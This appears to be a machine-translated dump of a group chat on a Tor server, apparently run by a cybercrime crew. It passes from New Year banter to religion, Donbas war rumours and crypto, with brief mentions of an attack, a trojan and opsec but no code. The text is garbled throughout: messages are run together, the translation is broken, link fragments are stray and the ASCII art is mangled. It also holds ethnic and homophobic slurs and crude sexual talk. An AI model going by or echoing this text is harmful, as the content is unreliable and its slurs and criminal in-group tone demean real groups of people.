gift for New Year's Eve, but I'm going to give you something for your own sake... I'm going to give you something for your own sake... i thought it was the old one))) well, yes. the picture is small.okay. and the file you download? Bad Request wrote now may i try too....)) re-logged? yespropala? encryption (benny all visible messageschpong+chpongpingAlf try to leave and come back on 5go try to re-login may be repeat? something strangeWe're waiting for the State Services database, and it's still not there, ok, Alf, you just have a status message at the bottom that you're trying to upload a file has been hanging since lunchKot not jealousI tried to send a picture to 100kb. I wrote chat that everything is ok. but no picture in the chat?:grin:I called the guy silent yes, Alf@rocco @adam assess the problem... Maybe temporarily end his session? someone said he stopped respondingIs it someone else exploiting the vulnerability? poke a wand for startersHe's really pouring the file? Maybe text him?"piss in one hand, dream in the other and see which one fills up fastest" (s)`Any movie. Consider it a classic. "fuck you, motherfuckers" (s)`bad santa, great movie for the new year with the download, i mean. Before that, everything was `is uploading` Well, he interrupted from time to time The main thing is that it was not Bad Santa I came here just for this information)))) The main thing is that our shuttle did not put it in the endada in fact?) alf is on firebombingMore likely the raw material) alfons decided to fill up the archive of GosServices ?) about infinity "here you can put pictures in the chat room ? 11:25 AM"- "looking forward to it !!!4:11 PM"- "looking forward to it !!!how long has he been uploading ? the whole team is in suspense ? how is the situation ? almost the president of "nezalezhnya", only he played the piano... why do we need a dick without a dick, when we have a dick to dick with...junk, but still a dick-artist of a fucking masterpiece? in addition to the theme of dicks`https://www.youtube.com/watch?v=L93vYKnqG7c`+test to look at these artists? who likes it! i am also against dicks in the chat room! Well you can not))), all here, monitor the chat, in case something important will be :sweat_smile:wankers... again for hand-to-hand violence ... Weldon, you all hope, or fransesotoydu, who will be in charge, wait for what picture? hopefully it will not be a card from santa claus at 2 bits) your will - our hands :grin:jerk off for me brothers !and we will have a fit of fighting chitretz, now you go away, we will see this picture I ran away for an hour, if anything I am here ! i hope there will be a snow maiden naked at 18 i hope there will be a postcard with Santa Claus at 6 gig in the ultra-hdon even stopped answering) it has to stop it i think when it boots, the rocket is fucked) i heard the modem buzzer :laughing:he just dialup downloaded from the 90s guys everything is in our hands! Saving guys, we're already cold to sit with his pants down, when to start it itching to Tom?) Well, what about the picture? All in anticipation already) dogs also want toclave which?i ordered malinka4, i need to revive the home server )10 gb of porno may be uploaded by alfons himself in rocketto ddos) pongping "in all positions" thesis "how i spent my summer with the snow Maiden" alfons, i have been downloading it for 5 minutes) what's going on there) the Omicron virus is just bursting with laughter) the covidapoyd mask, i'll sew the foreskin on it, it's so lame that someone here is a jew who got circumcised???:laughing:rocket ilon mask who's face )))))))))))))) da▄▀▀▄
▄"▀ " ▀"▄
▄"▀ ▀"▄
"
"
▀"▄▄ " ▄"▀
" ▄▀▄
" ▀ ▀
"
"
"
"
"
▄"▀▀"▄" "▄"▀"▄
▄"▀▀ ▀ ▀▀
"▀ ▀
"
" ▄"▄
▀" "▀ ▀" "▀
▀"▄ "▀ ▀" ▄"▀

／::.⇒ .::;ヽ
/::. ..:::;;;ヽ
/::. ..::;;;;ヽ
/::. ..::::;;;;i
（::. ..::;;;丿
>::...＿＿＿..::::;;;イ
!ヾ.￣⌒_＿￣彡|
iﾐ:::ミＣ＝ ≡:::: ）
|::::″. ´/
|::::: ヽ / /;|
|::: （ ' （ .::;;;|
|::: | ﾐ .ヽ＼|
|::: 丶ヽ ..:ヽ ）
|::: .i !::;;;;;|
|::: i .ﾉ . ::;;;;;|
|::: i .ﾉ . ::;;;;;|
|::: i .ﾉ . ::;;;;;|
|::: （ ヽ ..::;;;;;|
（ ＼ l. | ..:;;;;;;|
|::＼∨丿 ″..:;;;;;|
|::: （ ( ﾞ ..:;;;;;|
.彡.|::: |: ! .....:::;;;;;|ゞ巛ミ
巛从ﾐ彡ミ彡从巛彡ミ彡ﾐ彡》》
巛巛ミ人ﾐ彡巛彡从ミ巛ミ人ﾐ》》》》
巛彡巛彡从ミ》彡彡巛ミ人ﾐ彡ミ从》》картинки you can, I guess, if it's not pics with geo tags, can you put pictures in the chat room? it's our secret, just shhhh, when a pussy lovers pose in front of your face )) yes ladies love trance with well-do not listen to such a thing, slava kpss !thank allahumy we won't tell anyone)) good thing he's not here) or you'd have been fired) Alf don't forget what Silver said about references so you don't want to fuck anyone else I can't understand how you can pay money to clean your shit so order a housekeeper at my age housekeeper is like a sphere of intimate services I can't imagine it's hard. think about it, she washes the floor upside downWhy the housekeeper, if the wife can talk her husband through caressing and violenceAggressive sex is pleasant and somehow not expedientThere's another case) angelo likes a sharper relationshipwashed?Armin Van Buren/Paul Van Dyke/DJ Thiestofuu face to keep the pussy hanging outa yeah well yeah) listen))))) yeah we know )))))))))))) i like trance and i like her Weldon, you don't go all trancey here Aha and the dishes! and say it's your mutual decision and then you will forever clean the floors not trance?) and if she will drag you in? cruel)) You've got a fantasy ) You can fuck her and fuck yourself at the same time :D The model is Polish and kind of an MMA fighter Tomas, you should be afraid of her what for Kamil? Then you'll ask her to take her for money Be careful what you wish for ) Franz give her ah yes, that's why I go to my workplace ) Fuck, give me `Kamila Smogulecka` but then you can not watch the movie better of course excite them What else should I do with them? then they're turned on) and then they're turned on, saw every single day@thomas have rabbits/cats/parrots, although they also "turn on" their wives) kunilayki:grin:friend is a friend, my friend...(c) folk tales I remember how a friend wanted to share with me...a friend let him shareWhere can I get a wife? I also want to watch something...no, but I already know what I'm gonna watch today with my wife) @angelo haven't seen the movie - *happy end* 2021, about a hacker-programmer and a novice porn actress??let him twitch then you have to get a wifeAustral age for us men, it's when you can't beat yourself up in the morning with freshly squeezed juice, cereal and jerk off for forgetting and a cup of cocoa on toptake it and you have to do it !welloo, it does not work - "always young and always drunk") Veldon, you're suffering my friend buy new shock absorbers)) my wife came, turned on the old washing machine, put a blanket and left) the washing machine from the shift in the center of gravity hard (like hoholy on Maidan) began to jump))) oooh what on the server is not turned off?aaaagatipa like a comment or code? so previews do not merge? this is it, get it?) I wrapped myself in foil, I feel protected here hard someone started banging on the door, just as if they break out...mate recently was a joke, sitting at the PC, drinking coffee, behind him on TV Putin online conference speaks ... in a condom in a gold paper) ╭━━━━━━━╮
┃ ● ══ " ┃
┃""""""""""┃
┃""""""""""┃
┃""""""""""┃
┃ you're a cunt ┃
┃3↩┃ behind you ┃
┃┃ are on their way ┃
┃""""""""""┃
┃""""""""""┃
┃ ○ ┃
╰━━━━━━━╯ fucking thomas, urgently edit you at least wrap the links) how old I am just hardcore it's not even irkbys what the fuck they were called aah, and remember the form sites still on telnet channels?) @hammer there is something to jerk off to! Cool pictures! I heard it from a spammer. Fucking spammers! ░░░▄▄▄▓▀▀░░░░░░░▒▒▒▒▀▀▀▀▄░
░░▐"░▄▀░░░░░░░░░░░░░▀▄░░"▌
░░▐░▐░░░░░░░░░░░░░░░░░▐░░▌
░░▐▐░░░░░░░▀▄▒▄▀░░░░░░░▐░░▌
░░▐▐░░░░░░░▒▒▐▒▒░░░░░░░▐░░▌
░░▐▐░░░▄░░░░▒▐▒░░░▄░░░░▐░░▌
░░▐▐▒░░░░░▒▒▒▐▒▒▒░░░░░░▐░░▌░
░░▐░▀▄▒▒▒▒▒▄▀▒▀▄▒▒▒▒▒▄▀▌░▌░────────────────────▄▄▄▄
────────────────▄▄"▀▀──▀▀"▄
─────────────▄"▀▀─────────▀▀"▄
────────────▄"▀──▄▄▄▄▄▄──────▀
────────────"───"▌────▀▀"▄─────
────────────"──▄"────────▀▀▀"──
────────────"──"──▀▀▀──▀▀▀▄─▐──
────────────"──▌────────────▐──
────────────"──▌─▄▀▀▄───────▐──
───────────"▀▌"──▄▄▄───▄▀▀▄─▐──
───────────▌─▀───"▄"▌─▄▄▄────"─
───────────▌──────▀▀──"▄"▌────
───────────"───────────▀▀─────▐
────────────"──────▌──────────
────────────""────"──────────
─────────────"──▄──"▄"─▄────
─────────────"──▌─▄▄▄▄▄─"──
─────────────"─────▄▄──▄▀─
─────────────"▄──────────
─────────────"▀"▄▄──▄▄▄▄▄"▄▄▄▄▄
───────────▄""▄──▀▀▀"─────────
──────────""▄─"▄────"─────────
───▄▄▄▄"""──"▄─"▄───"─────────""▄▄▄
▄"▀▀────"────"──"▄──"▓▓▓▓▓▓▓▓▓"───▀▀▄
"──────"─────"───""""▓▓▓▓▓▓▓▓▓"────▀
"──────"─────"───"""""▓▓▓▓▓▓▓"──────
"─────"──────"───"""▀▀▀▀"▓▓▓"───────
"────"───────"───"───▄▄▄▄""""───────
"────"───────"──▄▀───────────"──▄───
"────"───────"─▄▀─────"""""▀▀▀─▄"───
"────"───────"▄▀────────"─"────"────
"────"───────"▀───────"""─"────"────
"─────"────▄"▀──────────"─"────"────
"─────"──▄""▀────────▄▀""─"▄───"────
"────▄"""▀─"───────▄"─▄"───"▄──"────
"─▄""▀──"──"─────▄"""─"─────"──"────
""▀────▄"───"▄▄▄"""""─▀▀▀▀"▀▀──"────
"──────"────▄▀──"""""─────"────▀"───
───────"──▄"▀───"""""─────"─────"───
──────▄"""▀─────▀"""▀─────"─────"───
─────────────────────────────────────
▀"▀─"▀▄─"─"─"▀────▄▀▀─▀"▀─▄▀▄─"▀▄─"─

─▀──▀─▀─▀▀▀─▀▀────▀▀───▀───▀──▀─▀─▄▄
───────────────────────────────────── we'll make our own party with blackjack and whores_____________________$$$
____________________$___$
_____________________$$$
_____________________$_$
_____________________$_$
___________________$$$_$$$
_________________$$__$$$__$$$
_______________$$__$$$$$$$___$
______________$_______________$
_____________$_________________$
_____________$_________________$
_____________$_____$$$$$$$$$$$$$$$
_____________$____$_______________$
_____________$____$___$$$$$$$$$$$$$
_____________$___$___$___________$$$
_____________$___$___$_$$$___$$$__$$
_____________$___$___$_$$$___$$$__$$
_____________$___$___$___________$$$
_____________$____$___$$$$$$$$$$$$$
_____________$_____$$$$$$$$$$$$$$
_____________$_________________$
_____________$____$$$$$$$$$$$$$$
_____________$___$__$__$__$__$
_____________$__$$$$$$$$$$$$$$
_____________$__$___$__$__$__$
_____________$___$$$$$$$$$$$$$$$
____________$$$_________________$$$
__________$$___$$$_________$$$$$___$$
________$$________$$$$$$$$$__________$$$
_______$__$$_____________________$$$$___$$
____$$$$$___$$$$$$$$______$$$$$$$_______$_$
__$______$$_________$$$$$$______________$_$$
_$____$____$____________________________$_$_$
_$_____$___$______________$$$$$$$$$$$___$_$_$$
_$$$____$___$__$$$$$$$$$$$$__________$___$_$_$$
$___$$$$____$__$_____________________$___$_$$_$
$$$____$___$$__$_____________________$$__$_$__$
$___$__$__$$___$______________________$__$$$__$
$_____$$_$____$$_______________$$$____$__$_$__$$Efrain started yesterday already :joy:Angelo n already started IRC then :)you already have a picture floating) where to start?)start-------------------------
_____$$$$$$$
_____$_____$
_____$__ __ $
______$_____$
____$_______$_______$$$$$$$$$$
___$_________$_______$______$
___$____ ______$_______$____ $
__$Within $________$__$
__$___________$________$_$
__$___________$__ ______ $
__$___________$_________$_
__$___________$_________$-
$$$$$$$$$$$$$_______$$$$$$$ the main thing is not to sew) and then sell) only domestic, only safe productpasha Durov will not do shit vk fuckin', goddamn shit - we'll sell pailletnye krosses ! to calculate from the online is easy now so much data collected it is just mega paranoias torom and ipn still need to disable automatic logins to messengers ee>let's make a group vk)
order taken. Expect it's clear that the timing of the attack has not been canceled by anyonebut libcaca logo is appropriatehost machine still need to cover some serious vpnomda, torr bullshit, let's do group vk) is no panacea security> I remember there was a plugin for mplayer which encoded the film in the mask and showed with the help of the letters in the console)
With ffmpeg with libcaca you can render video to ASCII... Fuck, they say... And in the heat it's behind the TOR... Motherland is where the ass is warm... Motherland, my brothers, the cats, the gang, the office, the Soviet Union, I serve!I remember there was a plugin for mplayer that encoded the movie in the Aski and showed it with the help of letters in the console) I'll go, but I will not go! You're the only one who will get a bonus out of all! You think it's so easy!? I'm trying here, are you trying to banish? Go rest, go away from the chat, all go away, let's hope no one started jerking off :Dahahahnee where?) the hell with it, with the head, a girl for Weldon found------------------------
░░░░░░░░░░░▄▄▀▀▀▀▀▀▀▀▄▄
░░░░░░░░▄▀▀░░░░░░░░░░░░▀▄▄
░░░░░░▄▀░░░░░░░░░░░░░░░░░░▀▄
░░░░░▌░░░░░░░░░░░░░▀▄░░░░░░░▀▀▄
░░░░▌░░░░░░░░░░░░░░░░▀▌░░░░░░░░▌
░░░▐░░░░░░░░░░░░▒░░░░░▌░░░░░░░░▐
░░░▌▐░░░░▐░░░░▐▒▒░░░░░▌░░░░░░░░░▌
░░▐░▌░░░░▌░░▐░▌▒▒▒░░░▐░░░░░▒░▌▐░▐
░░▐░▌▒░░░▌▄▄▀▀▌▌▒▒░▒░▐▀▌▀▌▄▒░▐▒▌░▌
░░░▌▌░▒░░▐▀▄▌▌▐▐▒▒▒▒▐▐▐▒▐▒▌▌░▐▒▌▄▐
░▄▀▄▐▒▒▒░▌▌▄▀▄▐░▌▌▒▐░▌▄▀▄░▐▒░▐▒▌░▀▄
▀▄▀▒▒▌▒▒▄▀░▌"▐░░▐▐▀░░░▌"▐░▀▄▐▒▌▌░░░▀
░▀▀▄▄▐▒▀▄▀░▀▄▀░░░░░░░░▀▄▀▄▀▒▌░▐
░░░░▀▐▀▄▒▀▄░░░░░░░░▐░░░░░░▀▌▐
░░░░░░▌▒▌▐▒▀░░░░░░░░░░░░░░▐▒▐
░░░░░░▐░▐▒▌░░░░▄▄▀▀▀▀▄░░░░▌▒▐
░░░░░░░▌▐▒▐▄░░░▐▒▒▒▒▒▌░░▄▀▒░▐
░░░░░░▐░░▌▐▐▀▄░░▀▄▄▄▀░▄▀▐▒░░▐
░░░░░░▌▌░▌▐░▌▒▀▄▄░░░░▄▌▐░▌▒░▐
░░░░░▐▒▐░▐▐░▌▒▒▒▒▀▀▄▀▌▐░░▌▒░▌
░░░░░▌▒▒▌▐▒▌_▒▒▒▒▒▒▒▒ let'sTrain before tomorrow, and you write like it's the last time) bot with you, why such difficultiesDid you download this script, to console convert pics? : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : :"-'\,,
..\: : : : : : : : : : :'\: : : : : : : : : : : : : :~,,: : : : : : : : : "~-.,_
...\ : : : : : : : : : : :\: /: : : : : : : : : : : : : : : ",: : : : : : : : : : :"~,_
... .\: : : : : : : : : : :\|: : : : : : : : :_._ : : : : : : \: : : : : : : : : : : : :"- .
... ...\: : : : : : : : : : \: : : : : : : : ( O ) : : : : : : \: : : : : : : : : : : : : : '\._
... ... .\ : : : : : : : : : '\': : : : : : : : "*": : : : : : : :|: : : : : : : : : : : : : : : |0)
... ... ...\ : : : : : : : : : '\: : : : : : : : : : : : : : : :/: : : : : : : : : : : : : : : /""
... ... .....\ : : : : : : : : : \: : : : : : : : : : : : : ,-": : : : : : : : : : : : : : : :
... ... ... ...\ : : : : : : : : : \: : : : : : : : : _=" : : : : : ',_.: : : : : : : :,-"
... ... ... ... \,: : : : : : : : : \: :""'~---~"" : : : : : : : : : : : : : : : :""~~And in the fur blockchain on ѕsdnu and──────▄▌▐▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▌
───▄▄""▌

"""""""▌"▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▌
▀(@)▀▀▀▀▀▀▀(@)(@)▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀(@)▀Welcome all:Happy New Year Da, I was surprised myself. I thought we were out of bitcoin) > that 1usdt == 1btc
well ... from your math my lord))) sorry) i fucked upElroy, i corrected it))) 1 usdt == 1$ it seems to me that 1usdt == 1btcnu it's fiat:
usdt, it seems──────▄▄▄▄▄▄▄
▄▄───▄▄▄▄▄▄▄▄""▀""▄───
████████████████████── ＭＥＲＲＹ 6/\9
─██████████████▀▀─── ＣＨＲＩＳＴＭＡＳ🎄🎅🎁
─""""""""""""""───────
─▀▀▀▀▀▀""" or should I say "fart"? Yeah, after saladsFart is a fart or what? @kermit , U2! or crypta is bnb, confused? fart in the new year@all happy holidays to you guys!onion/channel/general?msg=xYB3P9qSF8NzMJtiE) write it down)god can not be so irresponsible, this is the proof of his absence with age)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=AaY9X9wFXKdbLJHRo) or I will understand that there is a goda breathe, breathe it (with)
i'm the alpha and omega, the beginning and the end, i'm the beginning and the end, i'm the beginning and the end, i'm the omega, i'm the beginning and the end, i'm the beginning, i'm the omega, i'm the beginning and the end, i'm the omega, i'm the beginning and the end, i'm the omega, i'm the beginning and the end, i'm the omega, i'm the omega, and i'm the end, i'm the omega, and so is everything here if there are no god, then nobody will work here, i wish him too, and he's the wish-fulfillment, that's it, my friend.It's okay, my friend, to wish you reason and health. And I'm asleep. not fat, but bodypositive glory to Tesak! It's a fat troll I answer you glory to Russia! Is that better? Appreciate each other and believe in sex. Hail Satan! Good! Ugh on you... men, fry each other's hands @kermit @angelo listened and left the chat room. like in South Park what? Hmmm love each other love each other and believe in love.you're making a fuss about my asshole. good night, my dears. he's got a rocky ass[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=pETdNpriGs7dFuRGY) no) just wondering who started it. then we'll all lose angelo. no, i lost. we're having a sit-down?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Cg37z3KLmEe2pfKwL) he's been here longer than you. yeah, well... I flew in, you know)))))))))))))>For the eternal flight of desires and aspirations.
How did you get here. with such aspirations coffin, coffin, cemetery, faggotThe eternal flight of desires and aspirations.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=tkx2NvdJw6B7hteDo) that's not what I asked) I am for eternal life.@brent are you for cremation or for coffin? In 2014 they won the Nobel for this "not theory". There's already a direct application.buddha top! no. Not a theory.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=w7Ey7rpH7RYqRM4Hs) if I were a believer I'd probably be a Buddhist I don't know, I can't operate an hundred percent about the big bang as knowledge doesn't allow. But then again all this is teriaAngelo, you are fundamentally wrong.In your own words, if you can. Thank you in advance... I won't tell you anything, because it all comes down to theory and nothing more[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=4NvGRxsY8fYeKZ2br) Well, it's a secret) Well, tell me, please. I know that) Believe in the big bang and watch the Big Bang Theory. That's why I don't believe it. Apparently they have it forget it. How many boys were raped?! Well Catholics also keep secrets[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=BcHShtAbX2ckEJT85) I see, I think you believe in God, but you keep secrets[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Xk4kEFu
http://lurkmore.to/%D0%9C%D0%BD%D0%B5_%D0%B2%D0%B0%D1%81_%D0%B6%D0%B0%D0%BB%D1%8C
"Llan, everyone jerks off however they want." Yes, Ker, 6 years. How long have you been here? (https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=rXK5wZTZWwnXT8y7x) God is my god! Kermit, drop the knife, Efrain is joking! No. I'm a development engineer. Creator, according to you. [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=YpBTyctYkSMQRsdpo) open up. Brent, you just gotta live like a human being, whether you're a Satanist or an Eskimo, I don't give a fuck. Just don't do shit. I feel sorry for you.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=MuoNL3j3rXwJ7gcqf) Bro, are you a coder or what? You guys are all crazy. I feel sorry for you. But let's educate... There's no other way, alas. Allahu akbar! Hallelujah! Where the people in the head, God bless us. Everything is fucked up. I forgot the first of May. Don't anger God. Okey dokey. Stop it. The idea is outdated, politicians need to invent a new pipe. Don't go on. Money solves everything. Shut up. Angelo, they're all about this memory.I'm tired of this on May 9Now, no rudeness.For Efrain, money decides everything.And what? I would like to see what schoolchildren who raised 200k bucks on nft told you) they got so proud that we remember him better than anyone elseWho does not remember the past - has no future.)))))))))) anyway mankind is stepping on this rake and will continue to do so[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=qm7e9GGDoZgsHcZDK) it's God's way, why think about it?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=T26gSdhzHFcsNFQ6w) https://www.youtube.com/watch?v=Pugewp5ROCk&ab_channel=NoguSvel%C3%B3%21! I'm sure Mark Bernes is not talking about anything. Everything Efrain, run to hell.) Can I get the original? Listen to it.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=gpGdpTZipG8GTcPr2) it's a murky topic... the evil on earth.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwu)
and what did he get out of it? 8k car? Is it his? Learn it by heart![ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=aruqagHRAoCtmRHpy) I'll read it to the kish, but for you:[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=e2Py2sjd8giJYgE47) what's the top? although Jesus would go to jail for insulting believers like two fingers[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=eTXQifv5doXETru5c) i say that he should do everything for people if he went into this field, and not to profit from itJesus taught a little bit not so keblo crackEfren says that for the priest fuckin love good cars nangelo say)kucherovo[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=hstdySJnYevjtePe3) are you on sarcasm or not?They're washing away your sins, fat people, they're carrying your cross as if it's something bad. I've been to funerals 4 times this year, for 2, priests came in 8k cars+we need to start shorting the bitch market reacts to shit lightning and the market panics, but I don't remember it once a year or every year?I'd rather go to a zoo shelter zadonachuk why panicconsidering the fees every year, they fly Robinson's, pfft, so that their rennies are serviced properly, yeah fig) you have to take your dough to the ROC wait five years if prices do not fall, I'll go abroad to live without making a difference, So everything already costs a lot of money to buy urgently what they want to buy a buck at 80 so nashi rusty pierced helmet does not pierce the helmet do not fuck with a crutch or a mcua better with an avp) I would shoot with a Kalash I can not give guns I fucked up (pills again did not drink who military ID?I remember a patient in surgery uttered a vivid phrase - if I didn't know what they were treating, I'd think they were fucking. Angelo, believe me, you should take care of your ass :D[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=5Dju4qQJAhpKFXjq7) you should ask me) I promise you. Guys, by 70 we'll all have it.Alcohol, kurevone, there's more than one reason:D I heard it's from sitting on your ass, so I mostly try to lie down so don't piss, sportsmen are common and before 25 I had a brother at 20 who got it from a snowcatArtery.No, not a gut, but a vessel.Pfffhuevo you don't rekmenyuagakishka from your ass when your guts come out? hemorrhoids[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=EFHd3cZ3N5HPd2BtA) and hemorrhoids are what?if that's what they were talking about in the show with that stupid cunt. So, the idea of sticking it up your ass with hemorrhoids is not a good one. I haven't tried it. It's been around for 300 years.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=m7ZWe5TEnDnP8W9fF) Does it help? Angelo, you poor fuckers. I mean, the cucumber idea is not new. It depends who I stick it in their ass and squatting on a stump isn't.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=ndQLGjnvx68xqR2dn) cucumbers? And not like that, not that :D Not that treated.))) need a voiceover from Drozdov[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=CXCRzzLf6GvW9HYu3) some cats and shit lickingHe's a cat's ointmentPick a term yourself.Without the nastiness, or something.I'm happier with the women over 50. They smear pussy like ointment and cats lick it. Yeah... but who was being rude?) yeah, i didn't see that, he sucked off a dog? Guys, guys, no rudeness, please. sniffles[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=odygoaw2DiMzv2CbW) what are you looking at? even i couldn't think of such a thing, don't sweat it, i'm 16 years old, i don't fuck with you)) and i remember the dog panin, i think you can do a lot in life like i do when you love kids) take them away? it's good that i did not get like that) (and when kids, it's fucked up) i love you, and i've loved you for a long time. what example are you setting? Angelo, do not be like that. Especially when talking about love. I realized there's no buzz. I lost interest in them at 18. I'm not a member there. Whores in general are pfff, when elections@efrain what's in a man's state? 50, you're 30, 40, fuck, and then there's passion. I agree. There is no point.Then all the fadebersamurai when every touch gives you a discharge is temporary) when the heart beats like an engine not thrown too little And we just make money ...))))sex better to pay a woman right away for sex than pay all your life) our artillery will support you, lolStop. it's you - cyberhoppers.:D come here, now a trojan huyachuSupport me, brothers! we are cyberhoppers bababobs zloty we are not about love feelings - chemistry How not to believe in love?! It's like not believing in chemistry or what kind of love do you mean? I love my family, but not chicks! Paradox! I'm just surprised at the man who works with us and does not believe in love! It's your second nickname not?) I eat plov What are you doing? I do not have you) And in the toad? Just over a year, probably a rare bird in the chat room) How long with us? What do you want to ask? I have not seen you.Efrain, and you who?egoism in its right understandingbelieve in yourself, love your family, and the idea....and the idea is happinessFucking hell.there is no love only faith in yourselfand the idea isNo thought about it? And if faith, the idea and love?there's chance, luck and fucking randomYes, my friend, me too. you know, i'm sick of fucking burying people. i'm afraid to even discuss it with you. oh, angelo, you are so wrong. you should have asked him more about personal matters. yeah. we got one thing going for us. We stimulated Kermit....promorgaltam how god rested 24/7 more work will work in their eyes, you won't be able to sleep better in the live we certainly do not save anyone if there is no phyllox) somewhere there) in the ads on youtube you can look there about god just don't talk about god? onco crushed their eyes?for kids? maybe he was in the onco dispensary? no bro, we all ate, some less, some more. i'm serious, but you just want to laugh. easy exchange for their selflessness. people are getting stabbed by doctors[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=haWAd8ddXynwcj6Gq) you give him a red bandage) Guys, go to hell. Please.My war is overYes, only I could not survive.I rembo imagine someone at 15 dying without a scar.Well done Che, survivor)I do not have a living place on my body. I'm covered in scars. And I remember exactly the day and the hour when I stayed alive. God is a pill! woPutin God + Putin God what does that have to do with God? I'm alive.Prove it to me, there is no god.There is no god.There is no god.Patriotism and faith is propaganda? What-what? I saw the BLEEP! So you understand that patriotism, like faith is a propaganda weaponI had the Union collapsed before my eyes.Well, I'm 45 years old. I'm fucked up and they've got glory and honour. I've got poverty, people are under 30. I only rely on my eyes. Where's the poverty? What experience do you draw on? Poverty. What do you understand by fucked up? Sorry, if it's .....Angelo, honey, how old are you? When half the country is prescribed Kagocel and Arbidol when people talk to me about external enemies I don't get it in Krasnodar, more in Moscow...) We can do it ourselves, why should anyone conquer us?Yes, don't worry, the mortality rate exceeds the birth rate, we'll die out in 15 years. Right, that's why they do nasty things. The Brits. You can't see more than 10K died in 14> Madness!!!
What do you know about madness? What brothers? Madness!!! God damn it, are we going to shoot each other for the Brits' pleasure? I agree. I don't know anything about yours. Our grandfather is crazy. I don't know these fuckers. There's some artillery fire on the front line. It's not the front. Children and old people. Refugees went. The Rostov region governor asked for help from the federal center.What's up? I'm not following. Have you seen the nightmare on the front line? I approve. We love it too. Sorry. Otherwise we'll eat it ourselves. Give me the address. We'll find it. We need to find Droop later. Give me the address. Why so serious? I'm joking. Fuck, send the lard. I love lard. Think what you say! A Khohol is no brother to a Moskal. Our people here. Anybody has objective information on the line of contact? Friends. Brothers. are there any khokhli besides me? and to you, colleague, have a nice weekend, comrades![ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=wcooyM4FpZXmDjedA) well, you don't need a garage for that, it exists as a picture in nft only there are no hookers and your friends fuck you?) ew ew ew there is only one minus to fuck hookers on fufaikes with your friends to make a kopeck while your wife is home to drink samonat shits behind them there is no cellar does anyone care about that?You can't help but be interested in it. It's a great idea. You just need better control. There's no need to change the system. They turned people in like dogs. They told us to fuck off like robots who are supposed to work for us in the capitalist world?)Big bugs in short, I saw the movie "Big Bug" today, we need communism. Communities need it, they are cunning, they quickly build one-person policies. Anyone interested, please write to China and pray for their dough.I'll sell my garages so we won't have to carry our own fucking burdens, we'll take it over with us brothers, or there will be no more 3 million people there in a couple of years...300 LNR with passports 400 with passports 700 thousand people are in the LNR and women and children in the first placeNow the LNR population is much larger. Do they plan to evacuate only those who have passports? Shah and mate, statistics show that there are 700 thousand people planned to be evacuated. And there is a circus in politics - I make money and live in the middle of bullshit - the media are bullshitting our people, everything is bought and bought back.
I was wrong. The evacuation is true.
Yesterday I saw the news about the evacuation, but it was disproved.Mutual ! All in peace and have a nice weekend ! @elijah write me thttp://ria.ru/20220218/vzryv-1773661617.html thanksKermit, this is all information terrorism, there are no evacuations or explosions. Only the usual shelling of the territories bordering with Ukr. It has been going on since 2014 without changing.What about the explosion in Donetsk? Kermit thank you! #Luck only dreams # As they say, but not like this, it is for us Have a good weekend Kermit you do not understand, I am leaving you guys for the weekend.
